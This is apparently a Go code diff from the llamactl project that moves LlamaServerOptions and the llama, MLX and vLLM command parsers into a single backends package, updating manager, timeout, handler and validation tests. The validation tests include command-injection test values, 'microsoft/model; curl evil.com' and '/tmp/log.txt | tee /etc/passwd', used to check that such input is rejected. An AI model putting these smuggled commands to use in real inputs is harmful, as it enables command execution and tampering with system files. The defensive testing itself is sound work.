-	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
@@ -15,7 +14,7 @@ func TestCreateInstance_Success(t *testing.T) {

 	options := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
@@ -42,7 +41,7 @@ func TestCreateInstance_ValidationAndLimits(t *testing.T) {
 	mngr := createTestManager()
 	options := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
@@ -98,7 +97,7 @@ func TestPortManagement(t *testing.T) {
 	// Test auto port assignment
 	options1 := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
@@ -116,7 +115,7 @@ func TestPortManagement(t *testing.T) {
 	// Test port conflict detection
 	options2 := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model2.gguf",
 			Port:  port1, // Same port - should conflict
 		},
@@ -134,7 +133,7 @@ func TestPortManagement(t *testing.T) {
 	specificPort := 8080
 	options3 := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  specificPort,
 		},
@@ -162,7 +161,7 @@ func TestInstanceOperations(t *testing.T) {

 	options := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
@@ -185,7 +184,7 @@ func TestInstanceOperations(t *testing.T) {
 	// Update instance
 	newOptions := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/new-model.gguf",
 			Port:  8081,
 		},
@@ -2,7 +2,6 @@ package manager_test

 import (
 	"llamactl/pkg/backends"
-	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
@@ -37,7 +36,7 @@ func TestTimeoutFunctionality(t *testing.T) {
 	options := &instance.Options{
 		IdleTimeout: &idleTimeout,
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
@@ -86,7 +85,7 @@ func TestTimeoutFunctionality(t *testing.T) {
 	// Test that instance without timeout doesn't timeout
 	noTimeoutOptions := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 		// No IdleTimeout set
@@ -117,21 +116,21 @@ func TestEvictLRUInstance_Success(t *testing.T) {
 	// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
 	options1 := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model1.gguf",
 		},
 		IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
 	}
 	options2 := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model2.gguf",
 		},
 		IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
 	}
 	options3 := &instance.Options{
 		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Model: "/path/to/model3.gguf",
 		},
 		IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
@@ -199,7 +198,7 @@ func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
 	createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Instance {
 		options := &instance.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
-			LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: model,
 			},
 			IdleTimeout: timeout,
@@ -4,9 +4,6 @@ import (
 	"encoding/json"
 	"fmt"
 	"llamactl/pkg/backends"
-	"llamactl/pkg/backends/llamacpp"
-	"llamactl/pkg/backends/mlx"
-	"llamactl/pkg/backends/vllm"
 	"llamactl/pkg/instance"
 	"net/http"
 	"os/exec"
@@ -130,7 +127,7 @@ func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
 			writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
 			return
 		}
-		llamaOptions, err := llamacpp.ParseLlamaCommand(req.Command)
+		llamaOptions, err := backends.ParseLlamaCommand(req.Command)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "parse_error", err.Error())
 			return
@@ -179,7 +176,7 @@ func (h *Handler) ParseMlxCommand() http.HandlerFunc {
 			return
 		}

-		mlxOptions, err := mlx.ParseMlxCommand(req.Command)
+		mlxOptions, err := backends.ParseMlxCommand(req.Command)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "parse_error", err.Error())
 			return
@@ -233,7 +230,7 @@ func (h *Handler) ParseVllmCommand() http.HandlerFunc {
 			return
 		}

-		vllmOptions, err := vllm.ParseVllmCommand(req.Command)
+		vllmOptions, err := backends.ParseVllmCommand(req.Command)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "parse_error", err.Error())
 			return
@@ -2,7 +2,6 @@ package validation_test

 import (
 	"llamactl/pkg/backends"
-	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/testutil"
 	"llamactl/pkg/validation"
@@ -85,7 +84,7 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
 		t.Run(tt.name, func(t *testing.T) {
 			options := &instance.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Port: tt.port,
 				},
 			}
@@ -139,7 +138,7 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
 			// Test with Model field (string field)
 			options := &instance.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model: tt.value,
 				},
 			}
@@ -177,7 +176,7 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
 			// Test with Lora field (array field)
 			options := &instance.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Lora: tt.array,
 				},
 			}
@@ -201,7 +200,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 			name: "injection in model field",
 			options: &instance.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model:  "safe.gguf",
 					HFRepo: "microsoft/model; curl evil.com",
 				},
@@ -212,7 +211,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 			name: "injection in log file",
 			options: &instance.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model:   "safe.gguf",
 					LogFile: "/tmp/log.txt | tee /etc/passwd",
 				},
@@ -223,7 +222,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 			name: "all safe fields",
 			options: &instance.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model:   "/path/to/model.gguf",
 					HFRepo:  "microsoft/DialoGPT-medium",
 					LogFile: "/tmp/llama.log",
@@ -252,7 +251,7 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
 		MaxRestarts:  testutil.IntPtr(5),
 		RestartDelay: testutil.IntPtr(10),
 		BackendType:  backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		LlamaServerOptions: &backends.LlamaServerOptions{
 			Port:      8080,
 			GPULayers: 32,
 			CtxSize:   4096,